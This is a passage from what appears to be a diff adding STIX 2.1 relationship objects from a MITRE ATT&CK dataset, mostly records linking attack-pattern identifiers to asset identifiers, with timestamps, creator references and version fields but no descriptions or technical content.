"modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "target_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a390f571-ce9b-45da-8e40-18576501f192", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a395bc9d-8656-4ef7-98ab-0018a0ee0faf", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3a70774-8c25-4d46-acf8-4b4bfe61d4ef", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3be4f62-cde7-4b35-aa41-72ef25710c33", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3c2bcd9-9ff4-486f-b824-3365269104be", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3c70922-ffcb-4132-8e45-43a7a6c70d3c", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3e1fb0c-d773-4b7b-88e9-f3b4952876e7", + "created": "2024-06-26T19:28:25.955Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:28:25.956Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a3f258ea-6d4d-4b0e-8ff2-b91f49dfd4d7", + "created": "2023-09-29T16:39:54.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:54.248Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a427f460-2f43-43ea-8a05-6fe09a0355c3", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a427fb69-2258-4b80-b5ed-68962d9ab55b", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a45cec05-2d81-4db1-9267-db8be498e0d2", + "created": "2023-09-29T16:46:50.699Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:46:50.699Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a466d5b4-39f0-48c1-9a19-f006dc4cb0ac", + "created": "2023-09-29T17:40:58.726Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:40:58.726Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a468fd3d-b1a8-4d1f-b19b-8073a80a0041", + "created": "2020-10-20T00:06:56.288Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a46f722e-4399-4aa6-b0a9-61fae9d0bf63", + "created": "2023-09-29T17:57:44.978Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:57:44.978Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a48d3607-1ab5-40ea-8975-7eaf39a34a2d", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a48f50a6-cf10-4aa4-8997-327437145bd4", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4a89c5a-a779-492e-a6b1-6de0df5f8dda", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4ab6906-d591-4b50-bdfa-de5a1dbf6524", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4b6f0e5-c2ad-4082-9181-69efb666a67c", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4babc37-ce82-4ef3-aaf0-bb1f637de851", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4c64fbc-bac4-44b8-ba52-8fcfa3f674e5", + "created": "2023-09-29T17:40:08.922Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:40:08.922Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4e3d03d-ef25-491f-b2a3-cc72b82c49b3", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4ed6c54-fd74-4581-9bd3-1f5f4fbd411e", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4f52f29-c8b7-4ec0-ab61-e8562f677c67", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4fa6769-b4f3-48d5-97a7-d63281883f9b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a4ffa3df-e3ec-4789-b566-846e9176cd62", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5116653-2305-4560-8c80-43dbeec7b998", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a513a4c4-2805-41fd-9472-c69e54f28cec", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a536134d-6ac5-465e-b8ba-32995decf5bb", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5666e91-9856-461f-8abf-41a7f2c7661e", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a57b6037-c6b7-437a-8034-4fac8309f134", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a597009b-1e0b-4833-9101-60fdc0a17990", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a597b26e-91ba-43b9-8701-139bb6c1e09e", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5a654f6-3617-483d-bda9-87670550e76c", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5b89b0e-8220-4d84-a064-00262e86bbd7", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5bf7189-d20e-4d0c-8320-bd2868964e4d", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5c0be38-012c-430c-9016-7377016db13f", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--a5f74257-0512-4133-a504-9c1b19d435d8", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": 